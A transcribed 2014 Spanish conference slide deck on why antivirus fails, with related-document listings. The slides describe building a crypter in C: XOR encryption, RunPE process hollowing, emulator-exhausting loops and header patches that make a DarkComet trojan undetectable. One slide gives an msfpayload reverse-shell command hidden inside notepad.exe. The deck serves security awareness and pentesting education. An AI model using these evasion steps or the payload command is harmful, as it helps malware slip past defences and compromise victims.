Desmitificando el Antivirus

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Desmitificando el Antivirus"

Transcripción

1 La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Desmitificando el Antivirus 2014 Centro Criptológico Nacional C/Argentona 20, MADRID

2 VIII JORNADAS STIC CCN-CERT Abraham Pasamar Navarro INCIDE 2

3 VIII JORNADAS STIC CCN-CERT Índice 1.- Efectividad de los Antivirus 2.- Evasión de Antivirus 3.- Crypters 4.- C Crypter 5.- Demo 3

4 VIII JORNADAS STIC CCN-CERT Antivirus 4

5 VIII JORNADAS STIC CCN-CERT Antivirus Nos protegen? Sí Hasta qué punto? Todo lo que pueden respecto de las infecciones comunes y lo que pueden prever 5

6 VIII JORNADAS STIC CCN-CERT Ataque dirigido (APT) Cybercriminales Nos protegen? No mucho Las técnicas de Detección de los AVs actualmente son insuficientes Las defensas convencionales son insuficientes 6

7 VIII JORNADAS STIC CCN-CERT Press Brian Dye, CEO de Symantec mayo 2014 Paradigma ha cambiado > protección AV host/perimetro es insuficiente 7

8 VIII JORNADAS STIC CCN-CERT AV s: Cómo funcionan? Escanean binarios en el DISCO Escanean en MEMORIA? algunos y poco :( Buscan AV BBDD Buscan TÉCNICAS MALICIOSAS (heurística) EMULADOR (ejecución parcial) Tiempo Real 8

9 VIII JORNADAS STIC CCN-CERT Por qué evadir AV s? BAD GUYS: MALWARE = $$$$$$$ Botnets, Ransomware APT GOOD GUYS: Auditoría, Pentesting 9

10 Cómo evadir AV s? VIII JORNADAS STIC CCN-CERT Encoders MALWARE suele ser una pieza compleja. Crypter es mucho más simple. Packers Permite proteger malware detectado. REUTILIZACIÓN Crypters msfpayload windows/shell/revers e_tcp LHOST= LPORT= 4444 R msfencode -c 5 -e x86/ shikata_ga_nai -x notepad.exe > notepad2.exe TIP: Método Público = MAL Método Privado = BIEN 10

11 Información sobre Crypters? Papers VIII JORNADAS STIC CCN-CERT Abusing File Processing in Malware Detectors for Fun and Profit (2012) Suman Jana and Vitaly Shmatikov The University of Texas at Austin Bypassing Anti-Virus Scanners (2012) InterNOT Security Team Hyperion: Implementation of a PE-Crypter (2012) Christian Ammann One packer to rule them all: Empirical identification, comparison and circumvention of current Antivirus detection techniques (BruCON 2014) Arne Swinnen,Alaeddine Mesbahi 11

12 VIII JORNADAS STIC CCN-CERT Foros Underground Manuales Video-Tutoriales Binarios Código Herramientas Multi AV-Scanners Enlaces:

13 VIII JORNADAS STIC CCN-CERT Qué es un Crypter? Software creado para ocultar código malicioso y hacerlo indetectable a los antivirus (FUD) CRYPTER (Builder) STUB MALWARE DETECTADO CRYPTER + STUB XOR, RC4... exe dll recurso STUB MALWARE CIFRADO 13

14 VIII JORNADAS STIC CCN-CERT Builder/Stub 14

15 PROCESO 2 PROCESO 1 VIII JORNADAS STIC CCN-CERT RunPE o Dynamic Forking CreateProcess (CREATE_SUSPENDED) EP I EP 2 ReadFile GetThreadContext WriteProcessMemory ResumeThread SetThreadContext BaseAddress PEB EBX EAX 15

16 Let s code a C Crypter VIII JORNADAS STIC CCN-CERT Builder MALWARE STUB C O N T E N E D O R MALWARE CIFRADO 16

17 Let s code a C Crypter VIII JORNADAS STIC CCN-CERT Builder RUTINA DE CIFRADO 17

18 Let s code a C Crypter VIII JORNADAS STIC CCN-CERT Builder STUB+FIRMA+MALWARE CIFRADO 18

19 VIII JORNADAS STIC CCN-CERT Let s code a C Crypter Stub Localizar la FIRMA SEPARADORA Descifrado (decryptbuffer=xor[buffer]) 19

20 VIII JORNADAS STIC CCN-CERT Let s code a C Crypter Stub Arrancar el proceso en memoria (Dynamic Forking) Estructuras CreateProcess WriteProcessMemory cabecera (CREATE_SUSPEND) ResumeThread ejecutable 20

21 VIII JORNADAS STIC CCN-CERT Let s code a C Crypter TROJAN SERVER (Darkcomet). SIN CRYPTER Multi AV SCAN TROJAN SERVER CRYPTED (stub+[crypted Darkcomet]) 21

22 Improving the Crypter VIII JORNADAS STIC CCN-CERT :( 13 Signatures Qué podemos hacer? API HOOKS :) GetProcAddress 22

23 Let s Scan the Crypter V1 - Original Crypter Multi AV SCAN VIII JORNADAS STIC CCN-CERT V2 - API Hooks 23

24 Improving the Crypter VIII JORNADAS STIC CCN-CERT Añadiendo soporte para parámetros main > WinMain (ncmdline) 24

25 Improving the Crypter Cambiando la rutina de cifrado XOR > byte SWAP VIII JORNADAS STIC CCN-CERT 25

26 Let s scan the Crypter V2 - API Hooks Multi AV SCAN VIII JORNADAS STIC CCN-CERT V3 - Parameters & byte Swap Ooohhh!!! 26

27 Improving the Crypter VIII JORNADAS STIC CCN-CERT FIRMAS indican HEURISTICA Matemos las firmas heurísticas!!! Exhausting routine Emulador > Time Out big loop ANTIVIRUS EMULATOR REAL TIME DETECTION No es posible procesarlo en tiempo real junk code 27

28 Let s Scan the Crypter V3 - Parameters & byte Swap Multi AV SCAN VIII JORNADAS STIC CCN-CERT V4 - Exhausting Routine OH YEAH!!! 28

29 Improving the Crypter FIRMAS Estáticas VIII JORNADAS STIC CCN-CERT AVAST Método de cifrado Variante: SWAP +/- 1 29

30 Improving the Crypter FIRMAS Estáticas VIII JORNADAS STIC CCN-CERT AVIRA Firmas Cabecera (CRC/clusterización) - FLAGS Sección CAMBIAMOS FLAGs VALOR NO ESPERADO 30

31 Let s scan the Crypter V4 - Exhausting Routine Multi AV SCAN VIII JORNADAS STIC CCN-CERT V6 - Cifrado+ & patch Flags Awesome!!! 31

32 VIII JORNADAS STIC CCN-CERT DEMO Crypter en C (FUD) Probarlo en un ataque Ingeniería social (1 click) Word + Macro (downloader) Sandworm (0 clicks) Ejecución FUD-Trojan en TR 32

33 Conclusiones Bypass AVs es POSIBLE -> Compromiso INFORMACIÓN VIII JORNADAS STIC CCN-CERT Necesario prestar atención al COMPORTAMIENTO Algunos elementos a considerar: Perímetro (callbacks C&C) SANDBOX Contexto 33

34 VIII JORNADAS STIC CCN-CERT IMÁGENES Banco Imáges Propio Flickr, user: eviltomthai Chiswick Chap - Own work 34

35 VIII JORNADAS STIC CCN-CERT GRACIAS POR SU INCIDE Avda. Diagonal, 640 6ª Planta Barcelona 1NC1D3 Companies > INCIDE - Investigación Digital Tel./Fax /

36 s Websites Síguenos en Linked in

Medidas fundamentales para mitigar el ciberespionaje. La segmentación

Medidas fundamentales para mitigar el ciberespionaje. La segmentación La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Medidas fundamentales para mitigar el ciberespionaje. La segmentación 2014 Centro Criptológico Nacional C/Argentona

Más detalles

Taller Plataforma Avanzada Malware

Taller Plataforma Avanzada Malware La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Taller Plataforma Avanzada Malware (MISP-MARTA-MARIA) 2014 Centro Criptológico Nacional C/Argentona 20, 28023

Más detalles

Homeland. La defensa del patrimonio tecnológico frente a los ciberataques. 10 y 11 de diciembre de 2014. www.ccn-cert.cni.es

Homeland. La defensa del patrimonio tecnológico frente a los ciberataques. 10 y 11 de diciembre de 2014. www.ccn-cert.cni.es La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Homeland 2014 Centro Criptológico Nacional C/Argentona 20, 28023 MADRID www.ccn-cert.cni.es El enemigo puede

Más detalles

Pre-fetching of suspicious mobile apps based on Big Data techniques and correlation

Pre-fetching of suspicious mobile apps based on Big Data techniques and correlation La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Pre-fetching of suspicious mobile apps based on Big Data techniques and correlation 2014 Centro Criptológico

Más detalles

i S La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 www.ccn-cert.cni.es

i S La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 www.ccn-cert.cni.es La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 i S 2014 Centro Criptológico Nacional C/Argentona 20, 28023 MADRID www.ccn-cert.cni.es Raúl Siles DinoSec Fundador

Más detalles

NOD32 Antivirus 5. Desde Georgia, con amor

NOD32 Antivirus 5. Desde Georgia, con amor Desde Georgia, con amor Está alguien ESET intentando espiar a Georgia? Nuevos Smart Security 5 y ESET NOD32 Antivirus 5 Fernando de la Cuadra, director de Educación (fernando@ontinet.com) Josep Albors,

Más detalles

Ghost in the Shell. La defensa del patrimonio tecnológico frente a los ciberataques. 10 y 11 de diciembre de 2014. www.ccn-cert.cni.

Ghost in the Shell. La defensa del patrimonio tecnológico frente a los ciberataques. 10 y 11 de diciembre de 2014. www.ccn-cert.cni. La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Ghost in the Shell 2014 Centro Criptológico Nacional C/Argentona 20, 28023 MADRID www.ccn-cert.cni.es Jaime

Más detalles

La defensa del patrimonio tecnológico frente a los ciberataques

La defensa del patrimonio tecnológico frente a los ciberataques La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 2014 Centro Criptológico Nacional C/Argentona 20, 28023 MADRID www.ccn-cert.cni.es Joaquín Seco Martínez joaquin.seco@csa.es

Más detalles

[Titulo] : Creacion de un Crypter [Lenguaje] : Delphi [Autor] : Doddy Hackman. [Temario]

[Titulo] : Creacion de un Crypter [Lenguaje] : Delphi [Autor] : Doddy Hackman. [Temario] [Titulo] : Creacion de un Crypter [Lenguaje] : Delphi [Autor] : Doddy Hackman [Temario] -- =================-------- 0x01 : Introduccion 0x02 : Creacion del Builder 0x03 : Creacion del Stub 0x04 : Probando

Más detalles

TorrentLocker se enmascara tras Cryptolocker y juega al despiste en la suplantación de Correos.

TorrentLocker se enmascara tras Cryptolocker y juega al despiste en la suplantación de Correos. TorrentLocker se enmascara tras Cryptolocker y juega al despiste en la suplantación de Correos. El pasado día 2 de diciembre de 2014 se detectó una campaña masiva de correos electrónicos cuyo objetivo

Más detalles

Ataques de relay en tarjetas EMV NFC con dispositivos Android

Ataques de relay en tarjetas EMV NFC con dispositivos Android La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Ataques de relay en tarjetas EMV NFC con dispositivos Android 2014 Centro Criptológico Nacional C/Argentona

Más detalles

lfgonzalez@iq-online.comonline.com

lfgonzalez@iq-online.comonline.com El orden de los bits sí altera el producto: Talón de Aquiles de los Antivirus VIII Jornada Nacional de Seguridad Informática Bogotá Colombia Colombia Luis Fernando González V. CEH iq Outsourcing S.A lfgonzalez@iq-online.comonline.com

Más detalles

La heurística en los virus

La heurística en los virus La heurística en los virus Francisco Eleazar Delgado Contreras Jesús Humberto Rojas Rangel José Luis Mares Monsiváis Coautor: Julio César González Cervantes FCFM-UANL Facultad de Ciencias Físico Matemáticas

Más detalles

DIA 22, Tendencias tecnológicas en detección de malware Phook & BuggyBoss

DIA 22, Tendencias tecnológicas en detección de malware Phook & BuggyBoss DIA 22, Tendencias tecnológicas en detección de malware Phook & BuggyBoss David Reguera García Técnico de operaciones en INTECO-CERT 22 Noviembre 2007 1º ENCUENTRO NACIONAL DE LA INDUSTRIA DE SEGURIDAD

Más detalles

Waledac, el troyano enamorado

Waledac, el troyano enamorado Autor: Sebastián Bortnik, Analista de Seguridad de ESET para Latinoamérica Fecha: Viernes 27 de Marzo del 2009 ESET, LLC 610 West Ash Street, Suite 1900 phone: (619) 876 5400, fax: (619) 437 7045 sales@eset.com,

Más detalles

Ransomware - Virus de la Policía

Ransomware - Virus de la Policía Madrid, Agosto 2015 Ransomware - Virus de la Policía Un ransomware es un tipo de programa informático malintencionado que restringe el acceso a determinadas partes o archivos del sistema infectado, y pide

Más detalles

UNIVERSIDAD NACIONAL DE INGENIERÍA

UNIVERSIDAD NACIONAL DE INGENIERÍA UNIVERSIDAD NACIONAL DE INGENIERÍA CENTRO DE EXTENSIÓN Y PROYECCIÓN SOCIAL AREA DE CURSOS DE ESPECIALIZACIÓN EN TECNOLOGÍAS DE LA INFORMACIÓN ESPECIALIZACIÓN EN ANALISIS, DESARROLLO E IMPLEMENTACIÓN DE

Más detalles

Kaspersky Anti-Virus 2012 Kaspersky Internet Security 2012

Kaspersky Anti-Virus 2012 Kaspersky Internet Security 2012 Kaspersky Anti-Virus 2012 Kaspersky Internet Security 2012 PAGE 2 Protección ante Nuevas Amenazas Escenario de las amenazas y respuestas Escenario de las amenazas: crecimiento del malware > 200,000,000

Más detalles

Ciberriesgos Su influencia en las empresas globalizadas. 2013 Centro Criptológico Nacional C/Argentona 20, 28023 MADRID

Ciberriesgos Su influencia en las empresas globalizadas. 2013 Centro Criptológico Nacional C/Argentona 20, 28023 MADRID Ciberriesgos Su influencia en las empresas globalizadas 2013 Centro Criptológico Nacional C/Argentona 20, 28023 MADRID Contenido 1. Sobre el CCN 2. Ciberataques: algunos números 3. Características 4. Motivación

Más detalles

MALWARE (PARTE 1) BY: Nologa93

MALWARE (PARTE 1) BY: Nologa93 MALWARE (PARTE 1) BY: Nologa93 1 INTRODUCCIÓN Estáis listos chicos? (siiii Nologa) jajaja ;D Como podéis ver en la portada del cuaderno, vamos a hablar un poco sobre el malware. Aprenderemos varias cosas

Más detalles

Malware Analysis (ransomware policía federal )

Malware Analysis (ransomware policía federal ) Malware Analysis (ransomware policía federal ) 6/6/2013 Autor: Alejandro Torres Ramírez (TorresCrack) T: @torrescrack248 http://torrescrack.blogspot.com Resumen La muestra analizada es sobre un ransomware

Más detalles

Are you the weakest link?

Are you the weakest link? La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Are you the weakest link? 2014 Centro Criptológico Nacional C/Argentona 20, 28023 MADRID www.ccn- cert.cni.es

Más detalles

Curso de Metasploit v0.3.

Curso de Metasploit v0.3. Curso de Metasploit v0.3. Autor: Ignacio Sorribas Mollar Metasploit v0.3. Índice Índice... 2 Changelog.... 3 Introducción.... 4 Fases de un test de intrusión.... 4 Comenzando a utilizar Metasploit....

Más detalles

ESPOCH - FACULTAD CIENCIAS BOLETÍN TÉCNICO INFORMÁTICO 02 22 de diciembre del 2008

ESPOCH - FACULTAD CIENCIAS BOLETÍN TÉCNICO INFORMÁTICO 02 22 de diciembre del 2008 VIRUS.... 1 INSTALACIÓN DE ANTIVIRUS... 2 ACTUALIZACIÓN SIN INTERNET.... 5 VIRUS. Al comportamiento extraño de nuestras PC, acostumbramos a decir que estamos infectados; y desde luego que algún tipo de

Más detalles

Ciberamenazas. Conclusiones 2012 / Tendencias 2013 SIN CLASIFICAR

Ciberamenazas. Conclusiones 2012 / Tendencias 2013 SIN CLASIFICAR Ciberamenazas. Conclusiones 2012 / Tendencias 2013 La Rioja, enero de 2013 Riesgos globales www.weforum.org 2 Índice Centro Criptológico Nacional - Marco Legal / Funciones - CCN-CERT Vulnerabilidades 2012

Más detalles

Tema 17. Algunos aspectos de seguridad informática

Tema 17. Algunos aspectos de seguridad informática Tema 17. Algunos aspectos de seguridad informática Virus y otro malware Cortafuegos Criptografía Recomendaciones de seguridad generales Virus y otro malware Malware Virus Troyanos Keyloggers Programas

Más detalles

Seguridad Informática ANTIVIRUS. Antivirus

Seguridad Informática ANTIVIRUS. Antivirus Seguridad Informática ANTIVIRUS Antivirus Que es un Antivirus??? Un antivirus es un programa informático específicamente diseñado para detectar bloquear y eliminar virus, utilizan diferentes técnicas para

Más detalles

Gusanos que dañan el Sistema Operativo

Gusanos que dañan el Sistema Operativo Gusanos que dañan el Sistema Operativo Autor: Sebastián Bortnik, Analista de Seguridad de ESET para Latinoamérica Fecha: 27 de julio del 2009 ESET, LLC 610 West Ash Street, Suite 1900 phone: (619) 876

Más detalles

Configuración ESET anti-ransomware. Más seguridad contra el secuestro de información

Configuración ESET anti-ransomware. Más seguridad contra el secuestro de información Configuración ESET anti-ransomware Más seguridad contra el secuestro de información ÍNDICE Objetivos de este documento técnico............ 3 Por qué usar esta configuración adicional?.......... 3 Configuración

Más detalles

Informe de Amenazas CCN-CERT IA-02/14. Riesgos de uso de Windows XP tras el fin de soporte

Informe de Amenazas CCN-CERT IA-02/14. Riesgos de uso de Windows XP tras el fin de soporte Informe de Amenazas Riesgos de uso de Windows XP tras el fin de soporte 22 de enero de 2014 LIMITACIÓN DE RESPONSABILIDAD El presente documento se proporciona de acuerdo con los términos en él recogidos,

Más detalles

Análisis de malware. Escenario

Análisis de malware. Escenario Análisis de malware Roberto Gómez Cárdenas ITESM-CEM rogomez@itesm.mx Lámina 1 Escenario Regreso oficina después de un fin de semana de 3 días. Quejas de que un servidor Windows esta lento. Primer paso:

Más detalles

S eguridad Informática

S eguridad Informática 1- D efinición de Virus 2 - R eproducción de los Virus 3 - Tipos de Virus 4 - Los daños que causan 5 - Formas de contagio 6 Otros Malware 6 Antivirus y Firewall 7 - Medidas de Prevención 1- D efinición

Más detalles

Lección 6: Malware. Bernardo Quintero bernardo@hispasec.com Hispasec VirusTotal Founder

Lección 6: Malware. Bernardo Quintero bernardo@hispasec.com Hispasec VirusTotal Founder Lección 6: Malware Bernardo Quintero bernardo@hispasec.com Hispasec VirusTotal Founder Malware: definición y tipos Malicious software Se denomina malware al software malicioso, diseñado para llevar cabo

Más detalles

Comparative Study of the Effectiveness of Intrusion Detection Systems

Comparative Study of the Effectiveness of Intrusion Detection Systems Comparative Study of the Effectiveness of Intrusion Detection Systems ANGÉLICA FLÓREZ ABRIL ÁLVARO ERNESTO ROBLES RINCÓN DAMIÁN FERNANDO PINTO NIÑO Agenda Introducción Información de la Investigación Parámetros

Más detalles

WORKSHOP PATAGONIA 2009

WORKSHOP PATAGONIA 2009 WORKSHOP PATAGONIA 2009 by Cvila Malware (código_malicioso) está definido tradicionalmente como cualquier archivo que causa daño a una computadora, servidor o red. Actualmente debemos agregar a la lista:

Más detalles

Dejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com

Dejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com Linux Week 2012 Dejando la puerta abierta: Making Metasploit Backdoors 13 de Marzo, 2012 Omar Palomino omarc320@gmail.com Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+. Administrador

Más detalles

Los mecanismos de seguridad convencionales ya no son suficientes

Los mecanismos de seguridad convencionales ya no son suficientes Los mecanismos de seguridad convencionales ya no son suficientes Acerca de mi Yered Céspedes Ingeniero en sistemas CISSP, CISA, CEH, CISM, ITIL Security+ Pentester Finalista de Global Cyberlympics 5 años

Más detalles

CCN-CERT El CERT Gubernamental Español

CCN-CERT El CERT Gubernamental Español CCN-CERT El CERT Gubernamental Español Servicio de Respuesta a Incidentes de Seguridad para la Administración Valencia, Noviembre 2008 PRESENTACIÓN FORO: Comunidad Valenciana SESIÓN: Iniciativa del CCN

Más detalles

El funcionamiento de un antivirus

El funcionamiento de un antivirus Antivirus Por: David Bonilla Bailon. CETis 49 Los antivirus nacieron como una herramienta simple cuyo objetivo fuera detectar y eliminar virus informáticos, durante la década de 1980 Con el transcurso

Más detalles

Contratación Productos y Servicios de Seguridad

Contratación Productos y Servicios de Seguridad SEGURIDAD DE LAS TEC. DE INFORMACIÓN Contratación Productos y Servicios de Seguridad 2012 Centro Criptológico Nacional C/Argentona 20, 28023 MADRID Índice 1 2 CCN Funciones Catálogo de Patrimonio y ENS

Más detalles

Catalogo cursos de Seguridad Informática

Catalogo cursos de Seguridad Informática Catalogo cursos de Seguridad Informática 1. Curso de Desarrollo Web Seguro Tema 1 El entorno Web 1.1 Introducción Introducción Arquitectura Web Problemas de seguridad más habituales: Comprensión de las

Más detalles

Servicio de Defensa frente a ataques de DDoS: Modelo colaborativo de detección

Servicio de Defensa frente a ataques de DDoS: Modelo colaborativo de detección La defensa del patrimonio tecnológico frente a los ciberataques 10 y 11 de diciembre de 2014 Servicio de Defensa frente a ataques de DDoS: Modelo colaborativo de detección 2014 Centro Criptológico Nacional

Más detalles

Malware Magazine Underc0de

Malware Magazine Underc0de 1 Índice A modo de prólogo Pág. 3 Qué significa la palabra Malware?... Pág. 5 Una mirada a la historia. Pág. 5 Evolución de los troyanos. Pág. 6 Partes de un troyano Pág. 7 Troyanos públicos y privados.

Más detalles

ecrime - las nuevas mafias Vicente Díaz

ecrime - las nuevas mafias Vicente Díaz ecrime - las nuevas mafias Vicente Díaz Full disclosure ecrime... me suena ecrime... me suena ecrime... me suena ecrime Land ecrime Land Puede no parecer gran cosa, pero País 58 de 197 PIB entre EAU y

Más detalles

Son herramientas diseñadas para detectar, bloquear y eliminar virus informáticos y otros programas maliciosos.

Son herramientas diseñadas para detectar, bloquear y eliminar virus informáticos y otros programas maliciosos. ANTIVIRUS: Qué es? Son herramientas diseñadas para detectar, bloquear y eliminar virus informáticos y otros programas maliciosos. Existen dos tipos de antivirus: de escritorio y en línea. Los antivirus

Más detalles

ESET CYBER SECURITY PRO para Mac Guía de inicio rápido. Haga clic aquí para descargar la versión más reciente de este documento.

ESET CYBER SECURITY PRO para Mac Guía de inicio rápido. Haga clic aquí para descargar la versión más reciente de este documento. ESET CYBER SECURITY PRO para Mac Guía de inicio rápido Haga clic aquí para descargar la versión más reciente de este documento. ESET Cyber Security Pro proporciona protección de última generación para

Más detalles

PROTECCIÓN ANTE LA INCERTIDUMBRE TECNOLOGÍA PROACTIVA B-HAVE DE BITDEFENDER PARA LUCHAR FRENTE A MÚLTIPLES AMENAZAS

PROTECCIÓN ANTE LA INCERTIDUMBRE TECNOLOGÍA PROACTIVA B-HAVE DE BITDEFENDER PARA LUCHAR FRENTE A MÚLTIPLES AMENAZAS PROTECCIÓN ANTE LA INCERTIDUMBRE TECNOLOGÍA PROACTIVA B-HAVE DE BITDEFENDER PARA LUCHAR FRENTE A MÚLTIPLES AMENAZAS El panorama actual de las amenazas en la red Tanto el panorama de la seguridad como la

Más detalles

Seguridad [Virus] M. en C. Sergio Luis Pérez Pérez. UAM CUAJIMALPA, MÉXICO, D. F. Trimestre 13-P. Sergio Luis Pérez (UAM CUAJIMALPA) Seguridad 1 / 30

Seguridad [Virus] M. en C. Sergio Luis Pérez Pérez. UAM CUAJIMALPA, MÉXICO, D. F. Trimestre 13-P. Sergio Luis Pérez (UAM CUAJIMALPA) Seguridad 1 / 30 Seguridad [Virus] M. en C. Sergio Luis Pérez Pérez UAM CUAJIMALPA, MÉXICO, D. F. Trimestre 13-P Sergio Luis Pérez (UAM CUAJIMALPA) Seguridad 1 / 30 Posibles ataques a un sistema Posibles ataques a un sistema

Más detalles

Nueva Variante Ransomware

Nueva Variante Ransomware Nueva Variante Ransomware CTB-Locker conocido también como Critroni.A, Onion-Locker es una nueva variante del tipo Ramsomware detectada en el inicio del año 2015, similar a las versiones pasadas esta amenaza

Más detalles

CCN-CERT El CERT Gubernamental Español

CCN-CERT El CERT Gubernamental Español CCN-CERT El CERT Gubernamental Español Servicio de Respuesta a Incidentes de Seguridad para la Administración Valladolid, Octubre de 2008 PRESENTACIÓN FORO: Comunidad de Castilla y León SESIÓN: Iniciativa

Más detalles

LOS ATAQUES DE DÍA CERO (ZERO DAY): EL NUEVO CAMPO DE BATALLA

LOS ATAQUES DE DÍA CERO (ZERO DAY): EL NUEVO CAMPO DE BATALLA GUÍA PRÁCTICA PARA COMBATIR EL MALWARE AVANZADO Lo que las empresas pequeñas, medianas y distribuidas deben saber sobre las amenazas de nueva generación en la red PUBLICADO EN SEPTIEMBRE DE 2014 LOS ATAQUES

Más detalles

AMENAZA AVANZADA APT Y CONTRAMEDIDAS

AMENAZA AVANZADA APT Y CONTRAMEDIDAS AMENAZA AVANZADA APT Y CONTRAMEDIDAS Advanced Persistent Threat (APT) y contramedidas Ing. Esp. Jorge Mario Rodríguez F. CISSP, CISM, CHFI, EnCE OCTUBRE 2011 Jorge.rodriguez@infoseguridad.com.co www.infoseguridad.com.co

Más detalles

María Camila Restrepo Castrillón. Mantener la Operatividad del Sistema

María Camila Restrepo Castrillón. Mantener la Operatividad del Sistema María Camila Restrepo Castrillón Mantener la Operatividad del Sistema RELACION ENTRE KERNEL Y VARIABLES DE ENTORNO Todas las variables tiene valores razonables de forma predeterminada, pueden ser modificadas

Más detalles

PROYECTO GUIA DE REFERENCIA: LOS ANTIVIRUS Y SUS TENDENCIAS FUTURAS ANGELICA MOSQUERA QUINTO ARLEY GUILLERMO RESTREPO ZULUAGA

PROYECTO GUIA DE REFERENCIA: LOS ANTIVIRUS Y SUS TENDENCIAS FUTURAS ANGELICA MOSQUERA QUINTO ARLEY GUILLERMO RESTREPO ZULUAGA PROYECTO GUIA DE REFERENCIA: LOS ANTIVIRUS Y SUS TENDENCIAS FUTURAS ANGELICA MOSQUERA QUINTO ARLEY GUILLERMO RESTREPO ZULUAGA Universidad Tecnológica de Pereira Facultad de Ingenierías Ingeniería de Sistemas

Más detalles

PROPUESTA DE INFORME TÉCNICO PREVIO DE EVALUACIÓN DE SOFTWARE ADQUISICIÓN DE LJCENCIAS DE SOFTWARE ANTIVIRUS

PROPUESTA DE INFORME TÉCNICO PREVIO DE EVALUACIÓN DE SOFTWARE ADQUISICIÓN DE LJCENCIAS DE SOFTWARE ANTIVIRUS PROPUESTA DE INFORME TÉCNICO PREVIO DE EVALUACIÓN DE SOFTWARE ADQUISICIÓN DE LJCENCIAS DE SOFTWARE ANTIVIRUS 1. NOMBRE DEL ÁREA: Tecnologías de Información 2. RESPONSABLES DE LA EVALUACIÓN: Julio Becerra

Más detalles

INFORME TECNICO PREVIO DE EVALUACION DE SOFTWARE Nro.002-2013-OTIC-OGETIC-SG/MC SOFTWARE ANTIVIRUS PARA ESTACIONES Y SERVIDORES

INFORME TECNICO PREVIO DE EVALUACION DE SOFTWARE Nro.002-2013-OTIC-OGETIC-SG/MC SOFTWARE ANTIVIRUS PARA ESTACIONES Y SERVIDORES INFORME TECNICO PREVIO DE EVALUACION DE SOFTWARE Nro.002-201-OTIC-OGETIC-SG/MC SOFTWARE ANTIVIRUS PARA ESTACIONES Y SERVIDORES 1. NOMBRE DEL ÁREA Oficina de Tecnologías de la Información y Comunicaciones

Más detalles

HERRAMIENTA PILAR ESQUEMA NACIONAL DE SEGURIDAD

HERRAMIENTA PILAR ESQUEMA NACIONAL DE SEGURIDAD HERRAMIENTA PILAR ESQUEMA NACIONAL DE SEGURIDAD Madrid, Abril de 2010 Presentación FORO: VIII Foro de seguridad de Red IRIS SESIÓN: CCN MAGERIT- Herramienta PILAR. Ejemplo aplicación ENS OBJETIVO: Presentación

Más detalles

Obtención de datos del DNI-e. Jesús Pérez-Castilla Gil Juan Carlos Pérez García

Obtención de datos del DNI-e. Jesús Pérez-Castilla Gil Juan Carlos Pérez García Obtención de datos del DNI-e Jesús Pérez-Castilla Gil Juan Carlos Pérez García Arquitecturas disponibles PKCS#11. Estándar creado por RSA. Define un API genérico de acceso a dispositivos criptográficos.

Más detalles

Buenas Prácticas de Seguridad en el uso de dispositivos móviles. Alfredo Aranguren Tarazona, CISSP, CISA, CISM

Buenas Prácticas de Seguridad en el uso de dispositivos móviles. Alfredo Aranguren Tarazona, CISSP, CISA, CISM Buenas Prácticas de Seguridad en el uso de dispositivos móviles 1 32% de los usuarios creen que no se requiere software de seguridad en sus dispositivos móviles Fuente: McAfee 2 Estado actual de la seguridad

Más detalles

ESET NOD32 y otros antivirus

ESET NOD32 y otros antivirus ESET, LLC 610 West Ash Street, Suite 1900, San Diego, CA 92101, USA phone: +1 (619) 876 5400, fax: +1 (619) 437 7045 sales@eset.com, www.eset.com ESET NOD32 y otros antivirus Fecha: Lunes 12 de Abril de

Más detalles

Realizado por: Daniel Sánchez Álvarez

Realizado por: Daniel Sánchez Álvarez Realizado por: Daniel Sánchez Álvarez QUE SON? Es una red de equipos infectados por códigos maliciosos que son controlados por un atacante, disponiendo de sus recursos para que trabajen de forma conjunta

Más detalles

TRABAJO DE INTRODUCCION A LA INFORMATICA INTEGRANTE GLEIDIS ARRIETA SUAREZ GIANNY MENDEZ JIMENEZ DUVAN MORA CRISTO TUTOR ALEXANDER BENAVIDES

TRABAJO DE INTRODUCCION A LA INFORMATICA INTEGRANTE GLEIDIS ARRIETA SUAREZ GIANNY MENDEZ JIMENEZ DUVAN MORA CRISTO TUTOR ALEXANDER BENAVIDES TRABAJO DE INTRODUCCION A LA INFORMATICA INTEGRANTE GLEIDIS ARRIETA SUAREZ GIANNY MENDEZ JIMENEZ DUVAN MORA CRISTO TUTOR ALEXANDER BENAVIDES UNIVERSIDAD DE CARTAGENA CREAD MAGANGUÉ FACULTAD DE CIENCIAS

Más detalles

Babel Enterprise 2.0. Gestión de la seguridad para entornos corporativos. Area de Sistemas y Seguridad

Babel Enterprise 2.0. Gestión de la seguridad para entornos corporativos. Area de Sistemas y Seguridad Babel Enterprise 2.0 Gestión de la seguridad para entornos corporativos Area de Sistemas y Seguridad Qué es Abartia Team? Consultoría tecnológica de Software Libre Especializada en Sistemas y Seguridad,

Más detalles

Crear el shellcode polimórfico

Crear el shellcode polimórfico Crear el shellcode polimórfico Programación Michał Piotrowski Grado de dificultad En el artículo que apareció en el último número de la revista hakin9 hemos aprendido a crear y modificar el código de la

Más detalles

Dejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com

Dejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com Linux Week 2012 Dejando la puerta abierta: Making Metasploit Backdoors 13 de Marzo, 2012 Omar Palomino omarc320@gmail.com Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+. Administrador

Más detalles

1. Virus y antivirus. Módulo I. Navegación segura. Ciudadanía digital. Uso seguro y responsable de las TIC. 3 de 127

